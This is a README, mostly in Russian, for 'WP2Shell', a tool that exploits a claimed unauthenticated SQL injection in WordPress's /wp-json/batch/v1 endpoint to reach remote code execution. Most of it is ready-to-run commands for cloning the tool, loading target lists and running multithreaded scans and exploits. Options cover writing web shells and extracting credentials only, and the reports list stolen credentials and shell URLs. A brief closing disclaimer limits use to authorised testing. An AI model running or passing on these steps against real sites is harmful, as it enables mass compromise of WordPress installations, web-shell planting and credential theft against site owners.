
WP2Shell - CVE-2026-63030 / CVE-2026-60137 This tool exploits a critical SQL injection vulnerability in the WordPress REST API `/wp-json/batch/v1` endpoint, allowing unauthenticated attackers to execute arbitrary SQL queries and achieve Remote Code Execution (RCE) on vulnerable WordPress installations.
Полный инструмент для обнаружения и эксплуатации уязвимости пакетного REST API WordPress.
Данный инструмент эксплуатирует критическую SQL-инъекцию в конечной точке REST API WordPress /wp-json/batch/v1, позволяя неавторизованным злоумышленникам выполнять произвольные SQL-запросы и добиваться удалённого выполнения кода (RCE) на уязвимых установках WordPress.
Уязвимость: CVE-2026-63030 / CVE-2026-60137
Вектор: SQL-инъекция в конечной точке пакетного REST API WordPress (/wp-json/batch/v1)
Влияние: Неавторизованное RCE
Затронутые версии: WordPress 6.4.x и более ранние (конкретные версии уточняются)
SLEEP()ORDER BYINTO OUTFILE (если разрешено)# Клонирование репозитория
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Установка зависимостей
pip install requests beautifulsoup4
# Создание файла с целями
echo "https://target.com" > targets.txt
# Запуск обнаружения
python wp2shell.py targets.txt --scan --verbose
# Полная эксплуатация
python wp2shell.py targets.txt --exploit --verbose
# Сканирование одной цели с подробным выводом
python wp2shell.py targets.txt --exploit --verbose
# Настройка времени ожидания для медленных серверов
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Многопоточное сканирование (20 потоков)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Пропуск записи шелла (только извлечение учётных данных)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Принудительное использование конкретного HTTP-метода
python wp2shell.py targets.txt --exploit --method POST --verbose
JSON-отчёт: структурированные данные со статусом уязвимости и извлечёнными учётными данными
HTML-отчёт: красивая цветовая визуализация с кликабельными URL шелла
Данный инструмент предназначен только для образовательных целей и тестирования с разрешения. Используйте только на системах, которыми вы владеете или на которые получили явное разрешение. Автор не несёт ответственности за неправомерное использование.